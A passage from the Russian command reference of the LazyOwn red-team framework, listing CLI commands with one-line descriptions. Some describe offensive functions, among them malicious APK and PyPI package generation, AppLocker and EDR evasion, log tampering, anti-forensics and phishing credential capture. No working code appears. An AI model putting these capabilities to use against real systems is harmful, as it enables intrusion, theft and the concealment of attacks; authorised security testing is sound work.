Фаза: misc | Источник: cli/commands/database.py

Выводит список или добавляет учётные данные.

db_export

Фаза: misc | Источник: cli/commands/database.py

Экспортирует таблицу базы данных в CSV.

db_hosts

Фаза: misc | Источник: cli/commands/database.py

Выводит список или добавляет хосты в активной рабочей области.

db_import

Фаза: misc | Источник: cli/commands/database.py

Импортирует результаты сканирования в базу данных.

db_init

Фаза: misc | Источник: cli/commands/database.py

Инициализирует базу данных (создаёт схему, если она не существует).

db_loot

Фаза: misc | Источник: cli/commands/database.py

Выводит список или добавляет элементы добычи (loot).

db_notes

Фаза: misc | Источник: cli/commands/database.py

Выводит список или добавляет заметки.

db_services

Фаза: misc | Источник: cli/commands/database.py

Выводит список всех служб в активной рабочей области.

db_status

Фаза: misc | Источник: cli/commands/database.py

Показывает количество сущностей для активной рабочей области.

db_vulns

Фаза: misc | Источник: cli/commands/database.py

Выводит список или добавляет уязвимости.

db_workspace

Фаза: misc | Источник: cli/commands/database.py

Управляет рабочими областями (список, создание, переключение, удаление).

decode

Фаза: misc | Источник: cli/commands/misc_migrated.py Декодирует строку с использованием указанного значения сдвига и ключа подстановки.

doctor

Фаза: misc | Источник: cli/commands/misc_migrated.py

Предварительная проверка работоспособности окружения — убедитесь, что установка готова.

download_resources

Фаза: misc | Источник: cli/commands/misc_migrated.py

Загружает ресурсы в каталог sessions.

encode

Фаза: misc | Источник: cli/commands/misc_migrated.py

Кодирует строку с использованием указанного значения сдвига и ключа подстановки.

encoderpayload

Фаза: misc | Источник: cli/commands/misc_migrated.py

Применяет различные обфускации к заданной строке командной строки для создания нескольких обфусцированных версий.

encodewinbase64

Фаза: misc | Источник: cli/commands/misc_migrated.py

Кодирует заданную полезную нагрузку в строку Base64, подходящую для выполнения в Windows PowerShell.

engage

Фаза: misc | Источник: cli/commands/misc_migrated.py

Проводит одну цель через полную цепочку атаки одной командой.

exit

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выход из интерфейса командной строки.

explore

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показывает охват исследования и предложения по аддонам/инструментам для каждого сервиса.

fixel

Фаза: misc | Источник: cli/commands/misc_migrated.py

Исправляет права доступа к файлам и окончания строк в каталогах проекта.

fixperm

Фаза: misc | Источник: cli/commands/misc_migrated.py

Исправляет права доступа для shell-скриптов LazyOwn.

gencert

Фаза: misc | Источник: cli/commands/misc_migrated.py

Генерирует центр сертификации (CA), клиентский сертификат и клиентский ключ.

generate

Фаза: misc | Источник: cli/commands/payload_generation.py

Сгенерировать полезную нагрузку.

getseclist

Фаза: misc | Источник: cli/commands/misc_migrated.py

Получить словарь SecLists с GitHub.

god_nodes

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать наиболее связанные узлы («божественные узлы») из графа.

graph

Фаза: misc | Источник: cli/commands/misc_migrated.py

Генерирует граф из JSON-файлов полезной нагрузки, содержащих URL, RHOST и RPORT.

graph_overlay

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открыть наложение графа поверх графа знаний graphify.

graph_search

Фаза: misc | Источник: cli/commands/misc_migrated.py

Нечёткий поиск узлов по метке в графе знаний graphify.

gym

Фаза: misc | Источник: cli/commands/redteam_gym.py

Red Team Gym — геймифицированное обучение пентесту с рейтингом ELO.

h

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открыть новое окно в сессии tmux с использованием LazyOwn RedTeam Framework.

hex_to_plaintext

Фаза: misc | Источник: cli/commands/misc_migrated.py

Преобразует шестнадцатеричные данные из файла в обычный текст.

hooks

Фаза: misc | Источник: cli/commands/automation.py

Управление условными хуками — список, включение, отключение, добавление, удаление правил.

hooks_add

Фаза: misc | Источник: cli/commands/automation.py

Добавить новое правило условного хука (JSON-строка).

hooks_enable

Фаза: misc | Источник: cli/commands/automation.py

Включить или отключить правило хука.

hooks_fire

Фаза: misc | Источник: cli/commands/automation.py

Вручную вызвать событие хука для тестирования.

hooks_list

Фаза: misc | Источник: cli/commands/automation.py

Перечислить все правила условных хуков.

hooks_remove

Фаза: misc | Источник: cli/commands/automation.py

Удалить правило хука по имени.

hunt

Фаза: misc | Источник: cli/commands/misc_migrated.py

Запустить автономную цепочку эксплуатации против цели.

ignorearp

Фаза: misc | Источник: cli/commands/misc_migrated.py

Настраивает систему на игнорирование ARP-запросов путем установки параметра ядра.

ignoreicmp

Фаза: misc | Источник: cli/commands/misc_migrated.py

Настраивает систему на игнорирование ICMP-эхо-запросов путем установки параметра ядра.

ip

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает IP-адреса сетевых интерфейсов и копирует IP-адрес интерфейса tun0 в буфер обмена.

ip2asn

Фаза: misc | Источник: cli/commands/misc_migrated.py

Команда для получения ASN для заданного IP-адреса.

ip2hex

Фаза: misc | Источник: cli/commands/misc_migrated.py Convert an IPv4 address into its hexadecimal representation.

ipp

Phase: misc | Source: cli/commands/misc_migrated.py

Отображает IP-адреса сетевых интерфейсов и выводит IP-адрес интерфейса tun0.

karma

Phase: misc | Source: cli/commands/misc_migrated.py

Показывает рейтинг ELO, уровень кармы и прогресс исследования для этого оператора.

kick

Phase: misc | Source: cli/commands/misc_migrated.py

Обрабатывает процесс отправки поддельного ARP-пакета на указанный IP-адрес с заданным MAC-адресом.

killchain

Phase: misc | Source: cli/commands/misc_migrated.py

Показывает общий прогресс цепочки атак и управляет автоматическим обновлением.

l00t

Phase: misc | Source: cli/commands/misc_migrated.py

Единая добыча: показать, искать, повторно использовать, строить граф и помечать учётные данные.

lab

Phase: misc | Source: cli/commands/lab.py

Управление локальными лабораториями для практики CTF.

lazyscript

Phase: misc | Source: cli/commands/misc_migrated.py

Выполняет команды, определённые в файле lazyscript.

links

Phase: misc | Source: cli/commands/misc_migrated.py

Отображает список полезных ссылок и позволяет пользователю выбрать и скопировать ссылку в буфер обмена.

list

Phase: misc | Source: cli/commands/misc_migrated.py

Перечисляет все доступные скрипты в каталоге модулей.

listaliases

Phase: misc | Source: cli/commands/misc_migrated.py

Перечисляет все доступные алиасы.

load_session

Phase: misc | Source: cli/commands/misc_migrated.py

Загружает сессию из файла sessionLazyOwn.json и отображает статус различных параметров.

lock_target

Phase: misc | Source: cli/commands/collaboration.py

Получает рекомендательную блокировку на цель для предотвращения конфликтов инструментов.

login

Phase: misc | Source: cli/commands/cli_auth.py

Выполняет аутентификацию через users.json (те же пользователи, что и в lazyc2.py).

logout

Phase: misc | Source: cli/commands/cli_auth.py

Выход текущего оператора CLI и очистка токена запоминания.

lolbas_list

Phase: misc | Source: cli/commands/pwn.py

Перечисляет доступные техники LOLBAS (Living Off The Land) из плагинов.

loot

Phase: misc | Source: cli/commands/misc_migrated.py

Алиас для l00t — единая добыча (показать/искать/повторно использовать/граф/пометить).

makerc

Phase: misc | Source: cli/commands/resource_scripting.py

Записывает команды сессии в ресурсный скрипт.

marketplace

Phase: misc | Source: cli/commands/marketplace.py

Поиск и установка плагинов, дополнений и инструментов сообщества.

marketplace_config

Phase: misc | Source: cli/commands/marketplace.py

Интерактивный менеджер маркетплейса (curses TUI).

mkrc

Phase: misc | Source: cli/commands/resource_scripting.py

Алиас для makerc — запись команд в скрипт.

msfshellcoder

Phase: misc | Source: cli/commands/misc_migrated.py

Генерирует шелл-код в формате C с помощью msfvenom для пользовательской команды или для обратной оболочки (reverse shell).

nano

Phase: misc | Source: cli/commands/misc_migrated.py

Открывает или создаёт файл, используя строку в каталоге сессий, для редактирования с помощью nano.

neighbors

Phase: misc | Source: cli/commands/misc_migrated.py

Показывает соседей узла или команды в графе graphify.

news

Phase: misc | Source: cli/commands/misc_migrated.py

Показывает Hacker News в терминале.

next

Phase: misc | Source: cli/commands/misc_migrated.py

Показывает рекомендации по следующему шагу или выполняет активную автоподсказку.

note

Phase: misc | Source: cli/commands/misc_migrated.py

Захватывает быструю заметку оператора, привязанную к текущей цели и фазе.

notify

Phase: misc | Source: cli/commands/misc_migrated.py

Команда для запуска уведомления в стиле toastr.

op_create

Phase: misc | Source: cli/commands/caldera.py

Создать новую запланированную операцию.

op_list

Phase: misc | Source: cli/commands/caldera.py

Перечислить все операции.

op_pause

Phase: misc | Source: cli/commands/caldera.py

Приостановить выполняющуюся операцию.

op_plan

Phase: misc | Source: cli/commands/caldera.py

Заполнить шаги операции из playbook YAML или через вывод MITRE.

op_report

Phase: misc | Source: cli/commands/caldera.py

Сгенерировать полный отчёт по операции.

op_resume

Фаза: разное | Источник: cli/commands/caldera.py

Возобновить приостановленную операцию.

op_start

Фаза: разное | Источник: cli/commands/caldera.py

Запустить (или возобновить) операцию.

op_status

Фаза: разное | Источник: cli/commands/caldera.py

Показать статус операции.

op_stop

Фаза: разное | Источник: cli/commands/caldera.py

Остановить выполняющуюся операцию.

op_timeline

Фаза: разное | Источник: cli/commands/caldera.py

Показать временную шкалу событий операции.

operator_create

Фаза: разное | Источник: cli/commands/automation.py

Создать новый профиль оператора.

operator_delete

Фаза: разное | Источник: cli/commands/automation.py

Удалить профиль оператора.

operator_load

Фаза: разное | Источник: cli/commands/automation.py

Загрузить эффективную конфигурацию для оператора (базовая линия команды + переопределения).

operators

Фаза: разное | Источник: cli/commands/automation.py

Перечислить все профили операторов.

palette

Фаза: разное | Источник: cli/commands/misc_migrated.py

Просмотреть каталог команд оператора, сгруппированных по фазе kill-chain.

palette_k

Фаза: разное | Источник: cli/commands/misc_migrated.py

Открыть нечёткий оверлей палитры Command-K.

payload

Фаза: разное | Источник: cli/commands/misc_migrated.py

Загрузить параметры из указанного JSON-файла полезной нагрузки.

phase

Фаза: разное | Источник: cli/commands/misc_migrated.py

Получить или установить текущую фазу kill-chain.

pipeline

Фаза: разное | Источник: cli/commands/misc_migrated.py

Декларативный слой композиции: запуск YAML-конвейера команд LazyOwn.

pivot

Фаза: разное | Источник: cli/commands/misc_migrated.py

Записать недавно обнаруженную цель для перехода или показать цепочку переходов.

plan

Фаза: разное | Источник: cli/commands/caldera.py

Выбрать следующую наилучшую технику для выполнения для цели.

plan_apply

Фаза: разное | Источник: cli/commands/caldera.py

Запустить планировщик, затем автоматически создать и запустить операцию.

plan_detail

Фаза: разное | Источник: cli/commands/caldera.py

Показать полный ранжированный план (все кандидаты) для цели.

pop

Фаза: разное | Источник: cli/commands/misc_migrated.py

Открыть центрированное всплывающее окно в текущей tmux-сессии для выполнения shell-команды.

prev

Фаза: разное | Источник: cli/commands/misc_migrated.py

Показать предварительные команды для глагола (стрелка prev цепочки).

pwd

Фаза: разное | Источник: cli/commands/misc_migrated.py

Отображает текущую рабочую директорию и список файлов, а также копирует путь текущей директории в буфер обмена.

qa

Фаза: разное | Источник: cli/commands/misc_migrated.py

Быстро завершает приложение без подтверждения.

recommend_next

Фаза: разное | Источник: cli/commands/misc_migrated.py

Рекомендовать следующее действие через единый механизм рекомендаций.

register

Фаза: разное | Источник: cli/commands/cli_auth.py

Зарегистрировать новую учётную запись оператора в users.json.

resource

Фаза: разное | Источник: cli/commands/resource_scripting.py

Запустить улучшенный ресурсный скрипт.

rhost

Фаза: разное | Источник: cli/commands/misc_migrated.py

Копирует удалённый хост (self.params['rhost']) в буфер обмена и обновляет приглашение командной строки.

rich_tui

Фаза: разное | Источник: cli/commands/pwn.py

Запустить TUI-панель мониторинга на основе Rich.

rot

Фаза: разное | Источник: cli/commands/misc_migrated.py

Применить шифр подстановки ROT (вращение) к заданной строке.

rotf

Фаза: разное | Источник: cli/commands/misc_migrated.py

Применить шифр подстановки ROT (вращение) к заданному расширению.

rrhost

Фаза: разное | Источник: cli/commands/misc_migrated.py

Обновляет приглашение командной строки, чтобы включить удалённый хост (self.params['rhost']) и текущую рабочую директорию.

run

Фаза: разное | Источник: cli/commands/misc_migrated.py

Запускает конкретный скрипт LazyOwn или активный модуль.

scans

Фаза: разное | Источник: cli/commands/misc_migrated.py

Перечислить файлы сканирования nmap в sessions/ с возрастом, размером и открытыми портами.

scope

Фаза: разное | Источник: cli/commands/misc_migrated.py

Управлять авторизованной областью взаимодействия и состоянием защиты области.

search

Фаза: разное | Источник: cli/commands/module_manager.py Поиск модулей по имени, описанию или автору.

sh

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выполняет команду оболочки непосредственно из интерфейса LazyOwn.

share_finding

Фаза: разное | Источник: cli/commands/collaboration.py

Поделиться находкой или обнаруженными учетными данными с командой.

show

Фаза: разное | Источник: cli/commands/misc_migrated.py

Показать параметры, модули, полезные нагрузки или активные параметры модуля.

sitrep

Фаза: разное | Источник: cli/commands/misc_migrated.py

Вывести единый оперативный сводный отчет о ситуации.

spool

Фаза: разное | Источник: cli/commands/resource_scripting.py

Записывать вывод сеанса в файл.

stealth_off

Фаза: разное | Источник: cli/commands/pwn.py

Отключить режим скрытности.

suggest_next

Фаза: разное | Источник: cli/commands/misc_migrated.py

Предложить следующие команды, перемещаясь по графу на основе недавней активности.

sys

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выполняет команду оболочки непосредственно из интерфейса LazyOwn.

tab

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выполняет скрипт lazypyautogui.py с дополнительными аргументами.

tasks

Фаза: разное | Источник: cli/commands/misc_migrated.py

Просмотр и управление очередью задач из sessions/tasks.json.

team_chat

Фаза: разное | Источник: cli/commands/collaboration.py

Отправить сообщение всем подключенным операторам.

team_status

Фаза: разное | Источник: cli/commands/collaboration.py

Показать активных операторов и блокировки целей.

tenant

Фаза: разное | Источник: cli/commands/misc_migrated.py

Управление мультитенантностью: список, переключение или создание тенантов взаимодействия.

tgrep

Фаза: разное | Источник: cli/commands/misc_migrated.py

Поиск по всем предыдущим выводам команд и журналам сеансов.

timeline_browser

Фаза: разное | Источник: cli/commands/misc_migrated.py

Открыть средство просмотра временной шкалы по CSV-файлу отчета сеанса.

toast_clear

Фаза: разное | Источник: cli/commands/misc_migrated.py

Пометить все ожидающие события всплывающих уведомлений как просмотренные, не выводя их.

ttp_matrix

Фаза: разное | Источник: cli/commands/caldera.py

Отобразить матрицу покрытия MITRE ATT&CK по всем операциям.

ttp_rebuild

Фаза: разное | Источник: cli/commands/caldera.py

Повторно пройти по каталогу операций для обновления матрицы покрытия.

ttp_show

Фаза: разное | Источник: cli/commands/caldera.py

Показать детали для одной техники MITRE.

tui_theme

Фаза: разное | Источник: cli/commands/misc_migrated.py

Переключить цветовую тему TUI, используемую для заставки и стилизованного вывода.

unlock_target

Фаза: разное | Источник: cli/commands/collaboration.py

Снять рекомендательную блокировку с цели.

urldecode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Декодировать URL-закодированную строку.

urlencode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Закодировать строку для URL.

use

Фаза: разное | Источник: cli/commands/module_manager.py

Выбрать модуль для работы.

v

Фаза: разное | Источник: cli/commands/misc_migrated.py

Открыть новое окно в сеансе tmux с использованием LazyOwn RedTeam Framework.

whoami

Фаза: разное | Источник: cli/commands/cli_auth.py

Показать текущего вошедшего оператора CLI.

wizard

Фаза: разное | Источник: cli/commands/misc_migrated.py

Мастер первоначальной настройки с руководством — настройка rhost, lhost, домена, списков слов и другого.

13. Диагностика

lazy_payload_keys

Фаза: диагностика | Источник: cli/commands/diagnostics.py

Перечислить ключи, присутствующие в данный момент в полезной нагрузке родительской оболочки.

lazy_runtime

Фаза: диагностика | Источник: cli/commands/diagnostics.py

Вывести интерпретатор, платформу и основные пути LazyOwn.

Без категории

GET

Фаза: без категории | Источник: cli/commands/phishing_wizard.py

Описание отсутствует.

OPTIONS

Фаза: без категории | Источник: cli/commands/phishing_wizard.py

Описание отсутствует.

POST

Фаза: без категории | Источник: cli/commands/phishing_wizard.py

Описание отсутствует.

adcs_esc

Фаза: без категории | Источник: cli/commands/active_directory.py

Проверить службы сертификации Active Directory на наличие уязвимостей ESC1-ESC13.

ai_playbook

Фаза: некатегоризированный | Источник: cli/commands/ai.py

Сгенерировать наступательный плейбук из Nmap CSV + KB + Ollama.

ai_toggle

Фаза: некатегоризированный | Источник: cli/commands/ai.py

Включить или выключить встроенного ИИ-ассистента.

android_apk

Фаза: некатегоризированный | Источник: cli/commands/mobile_macos.py

Создать вредоносный APK с полезной нагрузкой reverse shell.

android_enum

Фаза: некатегоризированный | Источник: cli/commands/mobile_macos.py

Перечислить Android-устройство, подключённое через ADB.

applocker_csc

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать обход AppLocker через компиляцию и выполнение csc.exe.

applocker_installutil

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать полезную нагрузку для обхода AppLocker через InstallUtil.exe.

applocker_msbuild

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать полезную нагрузку для обхода AppLocker через MSBuild.exe.

applocker_mshta

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать полезную нагрузку для обхода AppLocker через mshta.exe.

applocker_presentation

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать ссылку для обхода AppLocker через PresentationHost.exe.

applocker_regsvcs

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать полезную нагрузку для обхода AppLocker через Regsvcs.exe/Regasm.exe.

applocker_rundll32

Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py

Создать обход AppLocker через rundll32.exe с помощью SCT-скриптлета.

arsenal_show

Фаза: некатегоризированный | Источник: cli/commands/payload_arsenal.py

Показать элементы арсенала полезных нагрузок.

ask

Фаза: некатегоризированный | Источник: cli/commands/ai.py

Задать вопрос ИИ с предварительно загруженным контекстом текущей сессии.

attack_surface

Фаза: некатегоризированный | Источник: cli/commands/reporting.py

Сгенерировать сводку поверхности атаки из данных разведки.

audit_complete_keys

Фаза: некатегоризированный | Источник: cli/commands/audit.py

Вывести подсказки автодополнения с учётом полезной нагрузки для частичной команды.

auditd_disable

Фаза: некатегоризированный | Источник: cli/commands/opsec_cleanup.py

Сгенерировать команды для отключения Linux auditd.

auto_loop

Фаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py

Запустить цель через автономный оркестратор-демон в фоновом режиме.

auto_populate

Фаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py

Разобрать последний XML-скан nmap и автоматически заполнить контекст полезной нагрузки.

autopivot

Фаза: некатегоризированный | Источник: cli/commands/pivoting.py

Автоматически обнаруживать внутренние сети и настраивать туннели pivot.

aws_privesc

Фаза: некатегоризированный | Источник: cli/commands/cloud_attacks.py

Повышение привилегий и перечисление в AWS.

bof_catalog

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Перечислить все BOF, доступные в курируемом каталоге.

bof_info

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Показать подробную информацию о BOF.

bof_install

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Установить и скомпилировать BOF, подготовив его для доставки через beacon.

bof_list

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Перечислить все установленные и подготовленные BOF.

bof_run

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Выполнить BOF на подключённом beacon.

bof_search

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Искать в каталоге BOF по ключевому слову.

bof_uninstall

Фаза: некатегоризированный | Источник: cli/commands/bof_registry.py

Удалить BOF и удалить его подготовленный файл.

c2_dns

Фаза: некатегоризированный | Источник: cli/commands/c2_profile.py

Настроить или отобразить профиль DNS beacon.

c2_profiles

Фаза: некатегоризированный | Источник: cli/commands/c2_profile.py

Перечислить все доступные транспортные профили C2.

c2_rotate

Фаза: некатегоризированный | Источник: cli/commands/c2_profile.py

Переключиться на следующий транспортный профиль C2 в очереди ротации.

c2_tls

Фаза: некатегоризированный | Источник: cli/commands/c2_profile.py

Отобразить текущий профиль TLS C2.

campaign_sitrep

Фаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py Псевдоним sitrep сохранён для совместимости с глаголами MCP (lazyown_campaign_sitrep).

cicd_scan

Фаза: не классифицировано | Источник: cli/commands/cicd.py

Сканирование CI/CD платформы на предмет ошибок безопасности.

cicd_secrets

Фаза: не классифицировано | Источник: cli/commands/cicd.py

Сканирование журнала сборки на предмет утёкших секретов.

clean_ad

Фаза: не классифицировано | Источник: cli/commands/anti_forensics.py

Очистка журналов событий Active Directory и кэшированных билетов Kerberos.

cloud_buckets

Фаза: не классифицировано | Источник: cli/commands/cloud.py

Перечисление облачных хранилищ (bucket) для заданного префикса.

cloud_enum

Фаза: не классифицировано | Источник: cli/commands/cloud.py

Перечисление метаданных облачного провайдера, хранилищ и IAM.

cloud_iam

Фаза: не классифицировано | Источник: cli/commands/cloud.py

Перечисление ролей и политик IAM в облаке.

cloud_metadata

Фаза: не классифицировано | Источник: cli/commands/cloud.py

Сбор метаданных облачных экземпляров (AWS IMDS, Azure, GCP).

cloud_scan

Фаза: не классифицировано | Источник: cli/commands/cloud.py

Полное сканирование безопасности облака: метаданные + хранилища + перечисление IAM.

container_detect

Фаза: не классифицировано | Источник: cli/commands/containers.py

Автоматическое обнаружение среды выполнения контейнера и примитивов побега.

container_escape

Фаза: не классифицировано | Источник: cli/commands/containers.py

Проверка текущего контейнера на известные векторы побега.

cover_tracks

Фаза: не классифицировано | Источник: cli/commands/anti_forensics.py

Выполнение всех операций анти-форензики последовательно.

crack_hashes

Фаза: не классифицировано | Источник: cli/commands/security.py

Взлом хэшей паролей из файла с помощью John the Ripper или Hashcat.

cross_cloud

Фаза: не классифицировано | Источник: cli/commands/cloud_attacks.py

Атаки на федерацию идентичности между облаками.

dacl_abuse

Фаза: не классифицировано | Источник: cli/commands/active_directory.py

Перечисление и эксплуатация опасных записей DACL/SACL в Active Directory.

delegation_attack

Фаза: не классифицировано | Источник: cli/commands/active_directory.py

Отображение вычисленных путей атак на делегирование с командами эксплуатации.

delegation_enum

Фаза: не классифицировано | Источник: cli/commands/active_directory.py

Перечисление конфигураций делегирования Kerberos.

depconfuse

Фаза: не классифицировано | Источник: cli/commands/supply_chain.py

Сканирование requirements.txt на предмет кандидатов для путаницы зависимостей.

depscan

Фаза: не классифицировано | Источник: cli/commands/supply_chain.py

Сканирование дерева каталогов на предмет файлов зависимостей и выявление рисков.

detect_edr

Фаза: не классифицировано | Источник: cli/commands/evasive_payload.py

Генерация команд для обнаружения EDR/AV на цели.

docker_enum

Фаза: не классифицировано | Источник: cli/commands/containers.py

Перечисление хоста Docker: контейнеры, образы, привилегии, точки монтирования.

dotnet_payload

Фаза: не классифицировано | Источник: cli/commands/payload_arsenal.py

Генерация полезной нагрузки .NET/C#.

edr_detect

Фаза: не классифицировано | Источник: cli/commands/edr_detect.py

Обнаружение продуктов EDR/AV на цели.

edr_profile

Фаза: не классифицировано | Источник: cli/commands/edr_detect.py

Генерация профиля обхода на основе обнаруженного EDR.

edr_script

Фаза: не классифицировано | Источник: cli/commands/edr_detect.py

Генерация скрипта PowerShell для обнаружения EDR.

entra_attack

Фаза: не классифицировано | Источник: cli/commands/cloud_attacks.py

Операции атак на Microsoft Entra ID / Azure AD.

evasion

Фаза: не классифицировано | Источник: cli/commands/evasive_payload.py

Генерация и управление профилями обхода для C2.

evasive

Фаза: не классифицировано | Источник: cli/commands/evasive_payload.py

Генерация полезных нагрузок, обходящих обнаружение, с использованием нескольких стратегий обфускации.

evasive_payload

Фаза: не классифицировано | Источник: cli/commands/evasive_payload.py

Генерация обходной полезной нагрузки с автоматическим обходом AV/EDR.

event_log

Фаза: не классифицировано | Источник: lazyown.py

Показать последние события EventBus. Использование: event_log [N] [категория]

facts_show

Фаза: не классифицировано | Источник: cli/commands/mcp_bridge.py

Показать структурированные факты, извлечённые из сканирования nmap и вывода инструментов.

forensic_clean

Фаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py Очистка форензик-артефактов — Prefetch, Shimcache, Amcache, Jump Lists и т.д.

form

Фаза: без категории | Источник: cli/commands/audit.py

Открыть интерактивную форму для известной команды. Использование: form <команда>.

fz

Фаза: без категории | Источник: cli/commands/audit.py

Нечеткий поиск команд. Использование: fz [запрос]. Пустой список выводит все команды.

gcp_privesc

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Повышение привилегий и перечисление в GCP.

gitlab_enum

Фаза: без категории | Источник: cli/commands/cicd.py

Перечислить экземпляр GitLab.

gpo_abuse

Фаза: без категории | Источник: cli/commands/active_directory.py

Перечисление и эксплуатация объектов групповой политики.

grep_log

Фаза: без категории | Источник: cli/commands/audit.py

Поиск по недавним выводам команд. Использование: grep_log <шаблон> [--cmd <имя>].

groq

Фаза: без категории | Источник: cli/commands/ai.py

Отправить запрос в API Groq, используя настроенный api_key.

jenkins_enum

Фаза: без категории | Источник: cli/commands/cicd.py

Перечислить экземпляр Jenkins.

k8s_attack

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Атака на Kubernetes — перечисление RBAC, побег из пода, etcd, постоянство.

k8s_enum

Фаза: без категории | Источник: cli/commands/containers.py

Перечислить кластер Kubernetes: поды, секреты, SA, RBAC.

k8s_pods

Фаза: без категории | Источник: cli/commands/containers.py

Список подов Kubernetes с деталями, важными для безопасности.

k8s_secrets

Фаза: без категории | Источник: cli/commands/containers.py

Список и декодирование секретов Kubernetes.

kerberoast

Фаза: без категории | Источник: cli/commands/active_directory.py

Продвинутый Kerberoasting — режим только AES, целевое перечисление SPN.

kerberos_ticket

Фаза: без категории | Источник: cli/commands/active_directory.py

Создание билетов Kerberos для постоянства и горизонтального перемещения.

linux_advanced_payload

Фаза: без категории | Источник: cli/commands/payload_arsenal.py

Генерация продвинутых полезных нагрузок для Linux (LD_PRELOAD, eBPF, PAM, модуль ядра).

llm_budget

Фаза: без категории | Источник: cli/commands/ai.py

Показать дневной бюджет LLM, лимит токенов на вызов и текущие расходы.

log_tamper

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Команды очистки журналов для разных платформ.

macos_keychain

Фаза: без категории | Источник: cli/commands/mobile_macos.py

Извлечение секретов из связки ключей macOS.

macos_payload

Фаза: без категории | Источник: cli/commands/payload_arsenal.py

Генерация полезных нагрузок для macOS (.app-пакеты, постоянство, обход TCC).

macos_persist

Фаза: без категории | Источник: cli/commands/mobile_macos.py

Генерация постоянства в macOS через LaunchAgent.

macos_tcc

Фаза: без категории | Источник: cli/commands/mobile_macos.py

Генерация обхода TCC (Transparency, Consent, Control) для macOS.

memory_clean

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Очистка артефактов памяти — билеты Kerberos, буфер обмена, переменные окружения, учетные данные.

mfa_bypass

Фаза: без категории | Источник: cli/commands/cicd.py

Перечисление и тестирование методов обхода MFA.

mutate_shellcode

Фаза: без категории | Источник: cli/commands/evasive_payload.py

Применение полиморфной мутации к шеллкоду для обхода сигнатур.

network_opsec

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Сетевая OPSEC — цепочки прокси, DoH, обнаружение canary, анализ трафика.

opsec

Фаза: без категории | Источник: cli/commands/security.py

Оценка риска OPSEC для команды LazyOwn перед выполнением.

opsec_score

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Оценка риска OPSEC в реальном времени с контекстным ограничением действий (v2).

orchestrate

Фаза: без категории | Источник: cli/commands/orchestration.py

Направить цель через единый оркестратор и вывести результат.

package_squat

Фаза: без категории | Источник: cli/commands/supply_chain.py

Генерация вредоносного PyPI-пакета для путаницы зависимостей.

parquet_query

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Запрос к базам знаний Parquet (GTFOBins, LOLBas, ATT&CK, сеансы).

pentest_report

Фаза: не категоризировано | Источник: cli/commands/reporting.py

Сгенерировать профессиональный отчёт о тесте на проникновение.

phish_report

Фаза: не категоризировано | Источник: cli/commands/phishing_wizard.py

Показать результаты кампании и перехваченные учётные данные.

phish_serve

Фаза: не категоризировано | Источник: cli/commands/phishing_wizard.py

Запустить лёгкий HTTP-сервер для фишинговых целевых страниц.

phish_wizard

Фаза: не категоризировано | Источник: cli/commands/phishing_wizard.py

Интерактивный мастер фишинговой кампании от начала до конца.

pivot_kill

Фаза: не категоризировано | Источник: cli/commands/pivoting.py

Завершить все туннели pivot и выполнить очистку.

pivot_proxy

Фаза: не категоризировано | Источник: cli/commands/pivoting.py

Запустить локальный SOCKS-прокси через цепочку pivot.

pivot_scan

Фаза: не категоризировано | Источник: cli/commands/pivoting.py

Сканировать внутренние сети через текущую цепочку pivot.

pivot_status

Фаза: не категоризировано | Источник: cli/commands/pivoting.py

Показать текущее состояние цепочки pivot.

playbook_run

Фаза: не категоризировано | Источник: cli/commands/mcp_bridge.py

Выполнить сгенерированный YAML-плейбук пошагово через оболочку.

polymorphic

Фаза: не категоризировано | Источник: cli/commands/payload_arsenal.py

Применить полиморфную мутацию к шелл-коду.

rag_query

Фаза: не категоризировано | Источник: cli/commands/mcp_bridge.py

Семантический поиск по артефактам сеанса (сканы, логи, заметки).

reload_addons

Фаза: не категоризировано | Источник: cli/commands/audit.py

Повторное сканирование каталогов lazyaddons/ и plugins/ на предмет изменений; перезагрузка новых.

rotate_aes

Фаза: не категоризировано | Источник: cli/commands/security.py

Сгенерировать новый AES-ключ и повторно зашифровать все запечатанные учётные данные.

route

Фаза: не категоризировано | Источник: lazyown.py

Направить запрос на естественном языке к инструменту LazyOwn. Использование: route

saas_enum

Фаза: не категоризировано | Источник: cli/commands/cloud_attacks.py

Перечислить SaaS-платформы — M365, Google Workspace, Salesforce, Slack, ServiceNow.

seal_credentials

Фаза: не категоризировано | Источник: cli/commands/security.py

Зашифровать все чувствительные значения в payload.json с помощью AES-256-GCM.

session_state

Фаза: не категоризировано | Источник: cli/commands/mcp_bridge.py

Псевдоним sitrep, сохранённый для соответствия глаголам MCP (lazyown_session_state).

set

Фаза: не категоризировано | Источник: lazyown.py

Установить параметр — единый интерфейс set/assign.

shred

Фаза: не категоризировано | Источник: cli/commands/anti_forensics.py

